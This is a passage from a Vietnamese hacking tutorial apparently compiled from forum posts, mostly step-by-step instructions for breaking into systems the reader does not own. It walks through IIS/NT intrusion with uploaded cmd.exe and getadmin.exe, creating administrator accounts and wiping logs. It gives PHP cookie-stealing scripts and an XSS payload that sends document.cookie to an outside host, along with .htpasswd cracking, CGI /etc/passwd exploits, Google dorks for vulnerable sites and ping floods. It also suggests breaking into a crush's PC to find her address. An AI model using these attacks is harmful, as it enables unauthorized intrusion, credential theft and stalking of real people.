được ICMP message này, traceroute sẽ biết được đã đến được hệ thống

đích xyz.com và kết thúc nhiệm vụ tại đây.

+ Trong trường hợp router không trả lời sau 5 giây, traceroute sẽ in ra một dấu

sao "*"(không biết) và tiếp tục gởi datagram khác đến host đích!

_Chú ý:

Trong windows: tracert hostname

Trong unix: traceroute hostname

( Tài liệu của viethacker.net )

18 . ) Ping và cách sử dụng :

_ Ping là 1 khái niệm rât đơn giản tuy nhiên rất hữu ích cho việc chẩn đoán

mạng. Tiểu sử của từ "ping" như sau: Ping là tiếng động vang ra khi 1 tàu ngầm

muốn biết có 1 vật thể khác ở gần mình hay ko, nếu có 1 vật thể nào đó

gần tàu ngầm tiếng sóng âm này sẽ va vào vật thể đó và tiếng vang lại sẽ

là "pong" vậy thì tàu ngầm đó sẽ biết là có gì gần mình.

_Trên Internet, khái niệm Ping cũng rất giống với tiểu sử của nó như đã đề

cập ở trên. Lệnh Ping gửi một gói ICMP (Internet Control Message Protocol) đến host,

nếu host đó "pong" lại có nghĩa là host đó tồn tại (hoặc là có thể với tới

đựoc). Ping cũng có thể giúp chúng ta biêt được luợng thời gian một gói tin

(data packet) đi từ máy tính của mình đến 1 host nào đó.

_Ping thật dễ dàng, chỉ cần mở MS-DOS, và gõ "ping địa_chỉ_ip", mặc định

sẽ ping 4 lần, nhưng bạn cũng có thể gõ

"ping ip.address -t"

Cách này sẽ làm máy ping mãi. Để thay đổi kích thước ping làm như sau:

"ping -l (size) địa_chỉ_ip "

Cái ping làm là gửi một gói tin đến một máy tính, sau đó xem xem mất bao lâu

gói tin rồi xem xem sau bao lâu gói tin đó quay trở lại, cách này xác định

được tốc độ của kết nối, và thời gian cần để một gói tin đi và quay

trở lại và chia bốn (gọi là "trip time"). Ping cũng có thể được dùng để làm

chậm đi hoặc đổ vỡ hệ thống bằng lụt ping. Windows 98 treo sau một phút lụt

ping (Bộ đệm của kết nối bị tràn – có qua nhiều kết nối, nên Windows

quyết định cho nó đi nghỉ một chút). Một cuộc tấn công “ping flood” sẽ

chiếm rất nhiều băng thông của bạn, và bạn phải có băng thông lớn hơn đối

phương ( trừ khi đối phương là một máy chạy Windows 98 và bạn có một modem

trung bình, bằng cách đó bạn sẽ hạ gục đối phương sau xấp xỉ một phút

lụt ping). Lụt Ping không hiệu quả lắm đổi với những đối phương mạnh hơn

một chút. trừ khi bạn có nhiều đường và bạn kiểm soát một số lượng

tương đối các máy chủ cùng ping mà tổng băng thông lơn hơn đối phương.

Chú ý: option –t của DOS không gây ra lụt ping, nó chỉ ping mục tiêu một cách

liên tục, với những khoảng ngắt quãng giữa hai lần ping liên tiếp. Trong tất

cả các hệ Unix hoặc Linux, bạn có thể dùng ping -f để gây ra lụt thực sự.

Thực tế là phải ping -f nếu bạn dùng một bản tương thích POSIX (POSIX - Portable

Operating System Interface dựa trên uniX), nếu không nó sẽ không phải là một bản

Unix/Linux thực sự, bởi vậy nếu bạn dùng một hệ điều hành mà nó tự cho nó

là Unix hay Linux, nó sẽ có tham số -f.

( Tài liệu của HVA và viethacker.net )

19 . ) Kỹ thuật xâm nhập Window NT từ mạng Internet :

_ Đây là bài học hack đầu tiên mà tôi thực hành khi bắt đầu nghiên cứu về

hack , bây giờ tôi sẽ bày lại cho các bạn . bạn sẽ cần phảI có một số

thờI gian để thực hiện được nó vì nó tuy dễ nhưng khó . Ta sẽ bắt đầu

:

_ Đầu tiên bạn cần tìm một server chạy IIS :

_ Tiếp đến bạn vào DOS và đánh ' FTP <the company name>'. VD :

c:\Ftp www.dodgyinc.com

( trang naỳ khi tôi thực hành thì vẫn còn làm được , bây giờ không biết họ

đã fix chưa , nếu bạn nào có trang nào khác thì hãy post lên cho mọI ngườI cùng

làm nhé )

Nếu connect thành công , bạn sẽ thấy một số dòng tương tự như thế này :

Connected to www.dodgyinc.com.

220 Vdodgy Microsoft FTP Service (Version 3.0).

User (www.dodgyinc.com:(none)):

Cái mà ta thấy ở trên có chứa những thông tin rất quan trọng , nó cho ta biết

tên Netbios của máy tính là “ Vdodgy ” . Từ điều này bạn có thể suy diễn ra

tên mà được sử dụng cho NT để cho phép ta có thể khai thác , mặc định mà

dịch vụ FTP gán cho nó nếu nó chưa đổi tên sẽ là “IUSR_VDODGY” . Hãy nhớ

lấy vì nó sẽ có ích cho ta . Nhập "anonymous” trong user nó sẽ xuất hiện dòng

sau :

331 Anonymous access allowed, send identity (e-mail name) as password.

Password:

Bây giờ passwd sẽ là bất cứ gì mà ta chưa biết , tuy nhiên , bạn hãy thử

đánh vào passwd là “anonymous” . Nếu nó sai , bạn hãy log in lạI thiết bị FTP ,

bạn hãy nhớ là khi ta quay lạI lần này thì không sử dụng cách mạo danh nữa (

anonymous ) mà sử dụng “'Guest” , thử lại passwd với “guest” xem thế nào .

Bây giờ bạn hãy đánh lệnh trong DOS :

Cd /c

Và sẽ nhìn thấy kết quả nếu như bạn đã xâm nhập thành công , bây giờ bạn

hãy nhanh chóng tìm thư mục 'cgi-bin' . Nếu như bạn may mắn , bạn sẽ tìm được

dễ dàng vì thông thường hệ thống quản lý đã đặt 'cgi-bin' vào nơi mà ta

vừa xâm nhập để cho các ngườI quản lý họ dễ dàng điều khiển mạng hơn .

thư mục cgi-bin có thể chứa các chương trình mà bạn có thể lợi dụng nó để

chạy từ trình duyệt Web của bạn . Ta hãy bắt đầu “quậy” nào .

_ Đầu tiên , bạn hãy chuyển tớ thư mục cgi-bin và sử dụng lệnh “Binary” (

có thể các bạn không cần dùng lệnh này ) , sau đó bạn dánh tiếp lệnh “put

cmd.exe” . Tiếp theo là bạn cần có file hack để cài vào thư mục này , hãy tìm

trên mạng để lấy 2 file quan trọng nhất đó là 'getadmin.exe' và 'gasys.dll' .

Download chúng xuống , một khi bạn đã có nó hãy cài vào trong thư mục cgi-bin . Ok

, coi như mọI việc đã xong , bạn hãy đóng cửa sổ DOS .

Bây giờ bạn hãy đánh địa chỉ sau lên trình duyệt của bạn :

http://www.dodgyinc.com/cgi-bin/getadmin.exe?IUSR_VDODGY

Sau vài giây bạn sẽ có được câu trả lời như ở dướI đây :

CGI Error

The specified CGI application misbehaved by not returning a complete set of HTTP headers. The

headers it did return are:

Congratulations , now account IUSR_VDODGY have administrator rights!

Thế là bạn đã mạo danh admin để xâm nhập hệ thống , việc cần thiết bây

giờ là bạn hãy tự tạo cho mình một account , hãy đánh dòng sau trên IE :

http://www.dodgyinc.com/cgi-

bin/cmd.exe?/c%20c:\winnt\system32

et.exe%20user%20hacker%20toilahacker%20/add

dòng lệnh trên sẽ tạo cho bạn một account login với user : anhdenday và passwd :

toilahackerBây giờ bạn hãy là cho user này có account của admin , bạn chỉ cần

đánh lên IE lệnh :

http://www.dodgyinc.com/cgi-bin/getadmin.exe?anhdenday

Vậy là xong rùi đó , bạn hãy disconnect và đến start menu -> find rồi search

computer 'www.dodgyinc.com'. Khi tìm thấy , bạn vào explore , explore NT sẽ mở ra bạn

hay nhập user và passwd để mở nó ( của tôi là user : anhdenday và passwd :

toilahacker ) .

Có một vấn đề là khi bạn xâm nhập hệ thống này thì sẽ bị ghi lại , do

đó để xoá dấu vết bạn hãy vào 'Winnt\system32\logfiles' mở file log đó rồI xoá

những thông tin liên quan đến bạn , rồI save chúng . Nếu bạn muốn lấy một

thông báo gì về việc chia sẽ sự xâm nhập thì bạn hãy thay đổi ngày tháng

trên máy tính vớI URL sau :

http://www.dodgyinc.com/cgi-bin/cmd.exe?/c%20date%2030/04/03

xong rồI bạn hãy xoá file 'getadmin.exe', và 'gasys.dll' từ 'cgi-bin' . Mục đích khi

ta xâm nhập hệ thống này là “chôm” pass của admin để lần sau xâm nhập một

cách hợp lệ , do đó bạn hãy tìm file SAM ( chứa pass của admin và member ) trong

hệ thống rồI dùng chương trình “l0pht crack” để crack pass ( Hướng dẫn về

cách sử dụng “l0pht crack v 3.02” tôi đã post lên rồi ,các bạn hãy tự nghiên

cứu nhé ) . Đây là link : http://vnhacker.org/forum/?act=ST&f=6&t=11566&s=

Khi crack xong các bạn đã có user và pass của admin rồI , bây giờ hãy xoá account

của user ( của tôi là “anhdenday” ) đi cho an toàn . Bạn đã có thể làm gì

trong hệ thống là tuỳ thích , nhưng các bạn đừng xoá hết tài liệu của họ

nhé , tội cho họ lắm .

Bạn cảm thấy thế nào , rắc rối lắm phải không . Lúc tôi thử hack cách này ,

tôi đã mày mò mất cả 4 giờ , nếu như bạn đã quen thì lần thứ 2 bạn sẽ

mất ít thờI gian hơn .

Ở phần 3 tôi sẽ đề cập đến HĐH Linux , đến cách ngắt mật khẩu bảo vệ

của một Web site , và làm thế nào để hack một trang web đơn giản nhất

.v.v…

20 . ) Cookie là gì ?

_ Cookie là những phần dữ liệu nhỏ có cấu trúc được chia sẻ giữa web site

và browser của người dùng. cookies được lưu trữ dưới những file dữ liệu

nhỏ dạng text (size dưới 4k). Chúng được các site tạo ra để lưu trữ/truy

tìm/nhận biết các thông tin về người dùng đã ghé thăm site và những vùng mà

họ đi qua trong site. Những thông tin này có thể bao gồm tên/định danh người

dùng, mật khẩu, sở thích, thói quen...Cookie được browser của người dùng chấp

nhận lưu trên đĩa cứng của máy mình, ko phải browser nào cũng hỗ trợ cookie.

Sau một lần truy cập vào site, những thông tin về người dùng được lưu trữ

trong cookie. Ở những lần truy cập sau đến site đó, web site có thể dùng lại

những thông tin trong cookie (như thông tin liên quan đến việc đăng nhập vào 1

forum...) mà người ko phải làm lại thao tác đăng nhập hay phải nhập lại các

thông tin khác. Vấn đề đặt ra là có nhiều site quản lý việc dùng lại các

thông tin lưu trong cookie ko chính xác, kiểm tra ko đầy đủ hoặc mã hoá các thông

tin trong cookie còn sơ hở giúp cho hacker khai thác để vượt qua cánh cửa đăng

nhập, đoạt quyền điêu khiển site .

_ Cookies thường có các thành phần sau :

+ Tên: do người lập trình web site chọn

+ Domain: là tên miền từ server mà cookie được tạo và gửi đi

+ Đường dẫn: thông tin về đường dẫn ở web site mà bạn đang xem

+ Ngày hết hạn: là thời điểm mà cookie hết hiệu lực .

+ Bảo mật: Nếu giá trị này đựơc thiết lập bên trong cookie, thông tin sẽ

đựơc mã hoá trong quá trình truyền giữa server và browser.

+ Các giá trị khác: là những dữ liệu đặc trưng được web server lưu trữ để

nhận dạng về sau các giá trị này ko chứa các khoảng trắng, dấu chấm, phẩy

và bị giới hạn trong khoảng 4k.

( Tài liệu của Viethacker.net )

Những hiểu biết cơ bản nhất để trở thành Hacker (p2)

21 . ) Kỹ thuật lấy cắp cookie của nạn nhân :

_ Trước hết , các bạn hãy mở notepad rồi chép đoạn mã sau vào notepad đó :

CODE

<?php

define ("LINE", "

");

define ("HTML_LINE", "");

function getvars($arr, $title)

{

$res = "";

$len = count($arr);

if ($len>0)

{

if (strlen($title)>0)

{

print("[--------$title--------]" . HTML_LINE);

$res .= "[--------$title--------]" . LINE;

}

foreach ($arr as $key => $value)

{

print("[$key]" . HTML_LINE);

print($arr[$key] . HTML_LINE);

$res .= "[$key]" . LINE . $arr[$key] . LINE;

}

}

return $res;

}

// get current date

$now = date("Y-m-d H:i:s");

$myData = "[-----$now-----]" . LINE;

$myData .= getvars($HTTP_GET_VARS, "");

// file

$file = $REMOTE_ADDR . ".txt";

$mode = "r+";

if (!file_exists($file))

$mode = "w+";

$fp = fopen ($file, $mode);

fseek($fp, 0, SEEK_END);

fwrite($fp, $myData);

fclose($fp);

?>

hoặc

CODE

<?php

if ($contents && $header){

mail("[email protected]" , "from mail script",$contents,$header) or

die('couldnt email it');

sleep(2);

?>

<script language=javascript>

</script>

<?php

} else {

echo "nope";

}

(Bạn hãy sửa cái [email protected] thành địa chỉ Mail của bạn ) .

Bạn hãy save cái notepad này với tên “< tên tuỳ các bạn >.php ” ( Nhớ là

phải có .php ) rồi upload lên một host nào đó có hỗ trợ PHP , trong VD của tôi

là abc.php .( Đối với các bạn đã từng làm Web chắc sẽ rất dễ phảI không ?

) . Đoạn mã này sẽ có nhiệm vụ ăn cắp thông tin (và có khi có cả cookie )

của nạn nhân khi họ mở dữ liệu có chứa đoạn mã này rồI tự động save

thông tin đó thành file < ip của nạn nhân >.txt .

_ Còn một cách nữa để lấy cookie đựơc sử dụng trên các forum bị lỗi nhưng

chưa fix , khi post bài bạn chi cần thêm đoạn mã sau vào bài của mình :

CODE

document.write('<img src=http://host_php/abc.php?abc='+escape(document.cookie)+'>')

với host_php : là địa chỉ bạn đã upload file ăn cắp cookie đó lên .

và abc.php là file VD của tôi .

_ Ví dụ : khi áp dụng trong tag img, ta dùng như sau:

CODE

[img]javascript: Document.write('<img

src=http://host_php/docs.php?docs='+escape(document.cookie)+'>')[/img]

hoặc:

[CODE

img]javascript: Document.write('&#x3cimg

src=http://host_php/docs.php?docs='+escape(document.cookie)+'&#x3e')[/img]

_ Bạn có thể tìm những trang web để thực hành thử cách trong VD này bằng cách

vào google.com tìm những forum bị lỗi này bằng từ khoá "Powered by …….. forum”

với những forum sau : ikonboard, Ultimate Bulletin Board , vBulletin Board, Snitz . Nếu các

bạn may mắn các bạn có thể tìm thấy những forum chưa fix lỗi này mà thực

hành , ai tìm được thì chia sẽ với mọi người nhé .

_ Còn nhiều đoạn mã ăn cắp cookie cũng hay lắm , các bạn hãy tự mình tìm thêm

.

22 . ) Cách ngắt mật khẩu bảo vệ Website :

_ Khi các bạn tới tìm kiếm thông tin trên một trang Web nào đó , có một số

chỗ trên trang Web đó khi bạn vào sẽ bị chặn lại và sẽ xuất hiện một box

yêu cầu nhập mật khẩu , đây chính là khu vực riêng tư cất dấu những thông

tin mật chỉ dành cho số người hoặc một nhóm người nào đó ( Nơi cất đồ

nghề hack của viethacker.net mà báo e-chip đã nói tới chẳng hạn ) . Khi ta click

vào cái link đó thì ( thông thường ) nó sẽ gọi tới .htpasswd và .htaccess nằm

ở cùng trong thư mục bảo vệ trang Web . Tại sao phải dùng dấu chấm ở trước

trong tên file '.htaccess'? Các file có tên bắt đầu là một dấu chấm '.' sẽ

được các web servers xem như là các file cấu hình. Các file này sẽ bị ẩn đi

(hidden) khi bạn xem qua thư mục đã được bảo vệ bằng file .htaccess .Hai hồ sơ

này có nhiệm vụ điều khiển sự truy nhập tới cái link an toàn mà bạn muốn

xâm nhập đó . Một cái quản lý mật khẩu và user name , một cái quản lý công

việc mã hoá những thông tin cho file kia . Khi bạn nhập đúng cả 2 thì cái link

đó mới mở ra . Bạn hãy nhìn VD sau :

CODE

Graham:F#.DG*m38d%RF

Webmaster:GJA54j.3g9#$@f

Username bạn có thể đọc được rùi , còn cái pass bạn nhìn có hiểu mô tê gì

không ? Dĩ nhiên là không rồi . bạn có hiểu vì sao không mà bạn không thể

đọc được chúng không ? cái này nó có sự can thiệp của thằng file .htaccess .

Do khi cùng ở trong cùng thư mục chúng có tác động qua lại để bảo vệ lẫn

nhau nên chúng ta cũng không dại gì mà cố gắng đột nhập rồi crack mớ mật

khẩu chết tiệt đó ( khi chưa có đồ nghề crack mật khẩu trong tay . Tôi cũng

đang nghiên cứu để có thể xâm nhập trực tiếp , nếu thành công tôi sẽ post

lên cho các bạn ) . Lỗi là ở đây , chuyện gì sẽ xảy ra nếu cái .htpasswd nằm

ngoài thư mục bảo vệ có file .htaccess ? Ta sẽ chôm được nó dễ dàng , bạn

hãy xem link VD sau :

http://www.company.com/cgi-bin/protected/

hãy kiểm tra xem file .htpasswd có được bảo vệ bởI .htaccess hay không , ta nhập

URL sau :

http://www.company.com/cgi-bin/protected/.htpasswd

Nếu bạn thấy có câu trả lờI 'File not found' hoặc tương tự thì chắc chắn

file này đã không được bảo vệ , bạn hãy tìm ra nó bằng một trong các URL sau

:

http://www.company.com/.htpasswd

http://www.company.com/cgi-bin/.htpasswd

http://www.company.com/cgi-bin/passwords/.htpasswd

http://www.company.com/cgi-bin/passwd/.htpasswd

nếu vẫn không thấy thì các bạn hãy cố tìm bằng các URL khác tương tự ( có

thể nó nằm ngay ở thư mục gốc đấy ) , cho đến khi nào các bạn tìm thấy

thì thôi nhé .

Khi tìm thấy file này rồi , bạn hãy dùng chương trình "John the ripper" hoặc

"Crackerjack", để crack passwd cất trong đó . Công việc tiếp theo hẳn các bạn đã

biết là mình phải làm gì rồI , lấy user name và passwd hợp lệ đột nhập vào

rùi xem thử mấy cô cậu “tâm sự” những gì trong đó , nhưng các bạn cũng

đừng có đổi pass của họ hay quậy họ nhé .

Cách này các bạn cũng có thể áp dụng để lấy pass của admin vì hầu hết

những thành viên trong nhóm kín đều là “có chức có quyền” cả .

23 . ) Tìm hiểu về CGI ?

_ CGI là từ viết tắt của Common Gateway Interface , đa số các Website đều đang

sử dụng chương trình CGI ( được gọI là CGI script ) để thực hiện những công

việc cần thiết 24 giờ hằng ngày . Những nguyên bản CGI script thực chất là

những chương trình được viết và được upload lên trang Web vớI những ngôn

ngữ chủ yếu là Perl , C , C++ , Vbscript trong đó Perl được ưa chuộng nhất vì

sự dễ dàng trong việc viết chương trình ,chiếm một dung lượng ít và nhất là

nó có thể chạy liên tục trong 24 giờ trong ngày .

_ Thông thường , CGI script được cất trong thư mục /cgi-bin/ trên trang Web như VD

sau :

http://www.company.com/cgi-bin/login.cgi

với những công việc cụ thể như :

+ Tạo ra chương trình đếm số người đã ghé thăm .

+ Cho phép những ngườI khách làm những gì và không thể làm những gì trên

Website của bạn .

+ Quản lý user name và passwd của thành viên .

+ Cung cấp dịch vụ Mail .

+ Cung cấp những trang liên kết và thực hiện tin nhắn qua lại giữa các thành

viên .

+ Cung cấp những thông báo lỗi chi tiết .v.v…..

24 . ) Cách hack Web cơ bản nhất thông qua CGI script :

_ Lỗi thứ 1 :

lỗi nph-test-cgi

+ Đánh tên trang Web bị lỗi vào trong trình duyệt của bạn .

+ Đánh dòng sau vào cuốI cùng : /cgi-bin/nph-test-cgi

+ Lúc đó trên URL bạn sẽ nhìn giống như thế này :

http://www.servername.com/cgi-bin/nph-test-cgi

+ Nếu thành công bạn sẽ thấy các thư mục được cất bên trong . Để xem thư

mục nào bạn đánh tiếp :

CODE

?<tên thư mục>/*

+ file chứa passwd thường được cất trong thư mục /etc , bạn hãy đánh trên URL

dòng sau :

http://www.servername.com/cgi-bin/nph-test-cgi?/etc/*

_ Lỗi thứ 2 :

lỗi php.cgi

+ Tương tự trên bạn chỉ cần đánh trên URL dòng sau để lấy pass :

http://www.servername.com/cgi-bin/php.cgi?/etc/passwd

Quan trọng là đây là những lỗi đã cũ nên việc tìm các trang Web để các bạn

thực hành rất khó , các bạn hãy vào trang google.com rồi đánh từ khoá :

/cgi-bin/php.cgi?/etc/passwd]

hoặc cgi-bin/nph-test-cgi?/etc

sau đó các bạn hãy tìm trên đó xem thử trang nào chưa fix lỗi để thực hành

nhé .

25 . ) Kỹ thuật xâm nhập máy tính đang online :

_ Xâm nhập máy tính đang online là một kỹ thuật vừa dễ lạI vừa khó . Bạn

có thể nói dễ khi bạn sử dụng công cụ ENT 3 nhưng bạn sẽ gặp vấn đề khi

dùng nó là tốc độ sử dụng trên máy của nạn nhân sẽ bị chậm đi một cách

đáng kể và những máy họ không share thì không thể xâm nhập được, do đó

nếu họ tắt máy là mình sẽ bị công cốc khi chưa kịp chôm account , có một

cách êm thấm hơn , ít làm giảm tốc độ hơn và có thể xâm nhập khi nạn nhân

không share là dùng chương trình DOS để tấn công . Ok , ta sẽ bắt đầu :

_ Dùng chương trình scan IP như ENT 3 để scan IP mục tiêu .

_ Vào Start ==> Run gõ lệnh cmd .

_ Trong cửa sổ DOS hãy đánh lệnh “net view <IP của nạn nhân>”

+ VD : c:

et view 203.162.30.xx

_ Bạn hãy nhìn kết quả , nếu nó có share thì dễ quá , bạn chỉ cần đánh

tiếp lệnh

net use <ổ đĩa bất kỳ trên máy của bạn> : <ip của nạn nhân><ổ share của

nạn nhân>

+ VD : c:

et use E : 203.162.30.xxC

_ Nếu khi kết nối máy nạn nhân mà có yêu cầu sử dụng Passwd thì bạn hãy

download chương trình dò passwd về sử dụng ( theo tôi bạn hãy load chương trình

“pqwak2” áp dụng cho việc dò passwd trên máy sử dụng HĐH Win98 hoặc Winme và

chương trình “xIntruder” dùng cho Win NT ) . Chú ý là về cách sử dụng thì hai

chương trình tương tự nhau , dòng đầu ta đánh IP của nạn nhân , dòng thứ hai

ta đánh tên ổ đĩa share của nạn nhân nhưng đối với “xIntruder” ta chú ý

chỉnh Delay của nó cho hợp lý , trong mạng LAN thì Delay của nó là 100 còn trong

mạng Internet là trên dướI 5000 .

_ Nếu máy của nạn nhân không có share thì ta đánh lệnh :

net use <ổ đĩa bất kỳ trên máy của bạn> : <ip của nạn nhân>c$ (hoặc

d$)"administrator"

+ VD : net use E : 203.162.30.xxC$"administrator"

Kiểu chia sẽ bằng c$ là mặc định đối với tất cả các máy USER là

"administrator" .

_ Chúng ta có thể áp dụng cách này để đột nhập vào máy của cô bạn mà mình

“thầm thương trộm nhớ” để tìm những dữ liệu liên quan đến địa chỉ

của cô nàng ( với điều kiện là cô ta đang dùng máy ở nhà và bạn may mắn khi

tìm được địa chỉ đó ) . Bạn chỉ cần chat Y!Mass rồi vào DOS đánh lệnh :

c:

etstat –n

Khi dùng cách này bạn hãy tắt hết các cửa sổ khác chỉ để khung chat Y!Mass

với cô ta thôi , nó sẽ giúp bạn dễ dàng hơn trong việc xác định địa chỉ IP

của cô ta . Sau đó bạn dùng cách xâm nhập mà tôi đã nói ở trên .( Có lẽ anh

chàng tykhung của chúng ta hồi xưa khi tán tỉnh cô bạn ở xa qua mạng cũng dùng

cách này để đột nhập và tìm hiểu địa chỉ của cô ta đây mà , hi'hi' .

Bạn sẽ thành công nếu máy của nạn nhân không cài firewall hay proxy .

====================================================

Nhiều bạn có yêu cầu tôi đưa ra địa chỉ chính xác cho các bạn thực tập ,

nhưng tôi không thể đưa ra được vì rút kinh nghiệm những bài hướng dẫn có

địa chỉ chính xác , khi các bạn thực hành xong đoạt được quyền admin có

bạn đã xoá cái database của họ . Như vậy HVA sẽ mang tiếng là nơi bắt nguồn

cho sự phá hoại trên mạng . mong các bạn thông cảm , nếu có thể thì tôi chỉ

nêu những cách thức để các bạn tìm những dịa chỉ bị lỗi đó chứ không

đưa ra địa chỉ cụ thể nào .

====================================================

Tôi sẽ đề cập đến kỹ thuật chống xâm nhập vào máy tính của

mình khi bạn online , tìm hiểu sơ các bước khi ta quyết định hack một trang Web ,

kỹ thuật tìm ra lỗi trang Web để thực hành , kỹ thuật hack Web thông qua lỗi

Gallery.v.v…….

26 . ) Tìm hiểu về RPC (Remote Procedure Call) :

_ Windows NT cung cấp khả năng sử dụng RPC để thực thi các ứng dụng phân tán .

Microsoft RPC bao gồm các thư viện và các dịch vụ cho phép các ứng dụng phân

tán hoạt động được trong môi trường Windows NT. Các ứng dụng phân tán chính

bao gồm nhiều tiến trình thực thi với nhiệm vụ xác định nào đó. Các tiến

trình này có thể chạy trên một hay nhiều máy tính.

_Microsoft RPC sử dụng name service provider để định vị Servers trên mạng. Microsoft

RPC name service provider phải đi liền với Microsoft RPC name service interface (NIS). NIS

bao bao gồm các hàm API cho phép truy cập nhiều thực thể trong cùng một name

service database (name service database chứa các thực thể, nhóm các thực thể, lịch

sử các thực thể trên Server).

Khi cài đặt Windows NT, Microsoft Locator tự động được chọn như là name service

provider. Nó là name service provider tối ưu nhất trên môi trường mạng Windows NT.

27 . ) Kỹ thuật đơn giản để chống lại sự xâm nhập trái phép khi đang online

thông qua RPC (Remote Procedure Call) :

_ Nếu bạn nghi ngờ máy của mình đang có người xâm nhập hoặc bị admin remote

desktop theo dõi , bạn chỉ cần tắt chức năng remote procedure call thì hiện tại

không có chương trình nào có thể remote desktop để theo dõi bạn được . Nó còn

chống được hầu hết tools xâm nhập vào máy ( vì đa số các tools viết connect

dựa trên remote procedure call ( over tcp/ip )).Các trojan đa số cũng dựa vào giao

thức này.

Cách tắt: Bạn vào service /remote procedure call( click chuột phải ) chọn starup

typt/disable hoặc manual/ apply.

Đây là cách chống rất hữu hiệu với máy PC , nếu thêm với cách tắt file

sharing thì rất khó bị hack ) ,nhưng trong mạng LAN bạn cũng phiền phức với nó

không ít vì bạn sẽ không chạy được các chương trình có liên quan đến thiết

bị này . Tùy theo cách thức bạn làm việc mà bạn có cách chọn lựa cho hợp lý

. Theo tôi thì nếu dùng trong mạng LAN bạn hãy cài một firewall là chắc chắn

tương đối an toàn rồi đó .

( Dựa theo bài viết của huynh “Đời như củ khoai ” khoaimi – admin của HVA )

28 . ) Những bước để hack một trang web hiện nay :

_ Theo liệt kê của sách Hacking Exposed 3 thì để hack một trang Web thông thường ta

thực hiện những bước sau :

+ FootPrinting :

( In dấu chân )

Đây là cách mà hacker làm khi muốn lấy một lượng thông tin tối đa về máy

chủ/doanh nghiệp/người dùng. Nó bao gồm chi tiết về địa chỉ IP, Whois, DNS

..v.v đại khái là những thong tin chính thức có lien quan đến mục tiêu. Nhiều

khi đơn giản hacker chỉ cần sử dụng các công cụ tìm kiếm trên mạng để tìm

những thong tin đó.

Xem thêm tại đây

+ Scanning :

( Quét thăm dò )

Khi đã có những thông tin đó rồi, thì tiếp đến là đánh giá và định danh

những những dịch vụ mà mục tiêu có. Việc này bao gồm quét cổng, xác định

hệ điều hành, .v.v.. Các công cụ được sử dụng ở đây như nmap, WS pingPro,

siphon, fscam và còn nhiều công cụ khác nữa.

+ Enumeration :

( liệt kê tìm lỗ hổng )

Bước thứ ba là tìm kiếm những tài nguyên được bảo vệ kém, hoạch tài

khoản người dùng mà có thể sử dụng để xâm nhập. Nó bao gồm các mật khẩu

mặc định, các script và dịch vụ mặc định. Rât nhiều người quản trị mạng

không biết đến hoặc không sửa đổi lại các giá trị này.

+ Gaining Access:

( Tìm cách xâm nhập )

Bây giờ kẻ xâm nhập sẽ tìm cách truy cập vào mạng bằng những thông tin có

được ở ba bước trên. Phương pháp được sử dụng ở đây có thể là tấn

công vào lỗi tràn bộ đệm, lấy và giải mã file password, hay thô thiển nhất là

brute force (kiểm tra tất cả các trường hợp) password. Các công cụ thường

được sử dụng ở bước này là NAT, podium, hoặc L0pht.

+ Escalating Privileges :

( Leo thang đặc quyền )

Ví dụ trong trường hợp hacker xâm nhập đựợc vào mạng với tài khoản guest,

thì họ sẽ tìm cách kiểm soát toàn bộ hệ thống. Hacker sẽ tìm cách crack

password của admin, hoặc sử dụng lỗ hổng để leo thang đặc quyền. John và Riper

là hai chương trình crack password rất hay được sử dụng.

+ Pilfering :

( Dùng khi các file chứa pass bị sơ hở )

Thêm một lần nữa các máy tìm kiếm lại đựơc sử dụng để tìm các phương

pháp truy cập vào mạng. Những file text chứa password hay các cơ chế không an toàn

khác có thể là mồi ngon cho hacker.

+ Covering Tracks :

( Xoá dấu vết )

Sau khi đã có những thông tin cần thiết, hacker tìm cách xoá dấu vết, xoá các

file log của hệ điều hành làm cho người quản lý không nhận ra hệ thống đã

bị xâm nhập hoặc có biêt cũng không tìm ra kẻ xâm nhập là ai.

+ Creating "Back Doors" :

( Tạo cửa sau chuẩn bị cho lần xâm nhập tiếp theo được

dễ dàng hơn )

Hacker để lại "Back Doors", tức là một cơ chế cho phép hacker truy nhập trở lại

bằng con đường bí mật không phải tốn nhiều công sức, bằng việc cài đặt

Trojan hay tạo user mới (đối với tổ chức có nhiều user). Công cụ ở đây là

các loại Trojan, keylog…

+ Denial of Service (DoS) :

( Tấn công kiểu từ chối dịch vụ )

Nêu không thành công trong việc xâm nhập, thì DoS là phương tiện cuối cùng để

tấn công hệ thống. Nếu hệ thống không được cấu hình đúng cách, nó sẽ

bị phá vỡ và cho phép hacker truy cập. Hoặc trong trường hợp khác thì DoS sẽ

làm cho hệ thống không hoạt động được nữa. Các công cụ hay được sử

dụng để tấn công DoS là trin00, Pong Of Death, teardrop, các loại nuker, flooder .

Cách này rất lợi hại , và vẫn còn sử dụng phổ biến hiện nay .

_ Tuỳ theo hiểu biết và trình độ của mình mà một hacker bỏ qua bước nào .

Không nhất thiết phảI làm theo tuần tự . Các bạn hãy nhớ đến câu “ biết

người biết ta trăm trận trăm thắng ” .

( Tài liệu của HVA và hackervn.net )

Xem thêm tại đây

29 . ) Cách tìm các Website bị lỗi :

_ Chắc các bạn biết đến các trang Web chuyên dùng để tìm kiếm thông tin trên

mạng chứ ? Nhưng các bạn chắc cũng không ngờ là ta có thể dùng những trang

đó để tìm những trang Web bị lỗi ( Tôi vẫn thường dùng trang google.com và

khuyên các bạn cũng nên dùng trang này vì nó rất mạnh và hiệu quả ) .

_ Các bạn quan tâm đến lỗi trang Web và muốn tìm chúng bạn chỉ cần vào

google.com và đánh đoạn lỗi đó vào sau “allinurl : ” . VD ta có đoạn mã lỗi

trang Web sau :

cgi-bin/php.cgi?/etc/passwd

các bạn sẽ đánh :

“allinurl:cgi-bin/php.cgi?/etc/passwd”

Nó sẽ liệt kê ra những trang Web đang bị lỗi này cho các bạn , các bạn hãy

nhìn xuống dưới cùng của mỗi mẫu liệt kê ( dòng địa chỉ màu xanh lá cây )

nếu dòng nào viết y chang từ khoá mình nhập vào thì trang đó đã hoặc đang bị

lỗi .Các bạn có xâm nhập vào được hay không thì cũng còn tuỳ vào trang Web

đó đã fix lỗi này hay chưa nữa .

_ Các bạn quan tâm đến lỗi forum , các bạn muốn tìm forum dạng này để thực

tập , chỉ cần nhập từ khoá

powered by <tên forum> <số phiên bản>

VD sau là để tìm forum dùng Snitz 2000 :

powered by Snitz 2000

_ Tuy nhiên , việc tìm ra đúng forum hoặc trang Web bị lỗi theo cách đó có xác

suất không cao , bạn hãy quan tâm đến đoạn string đặc biệt trong URL đặc

trưng cho từng kiểu trang Web hoặc forum đó ( cái này rất quan trọng , các bạn

hãy tự mình tìm hiểu thêm nhé ) . VD tìm với lỗi Hosting Controller thì ta sẽ có

đoạn đặc trưng sau

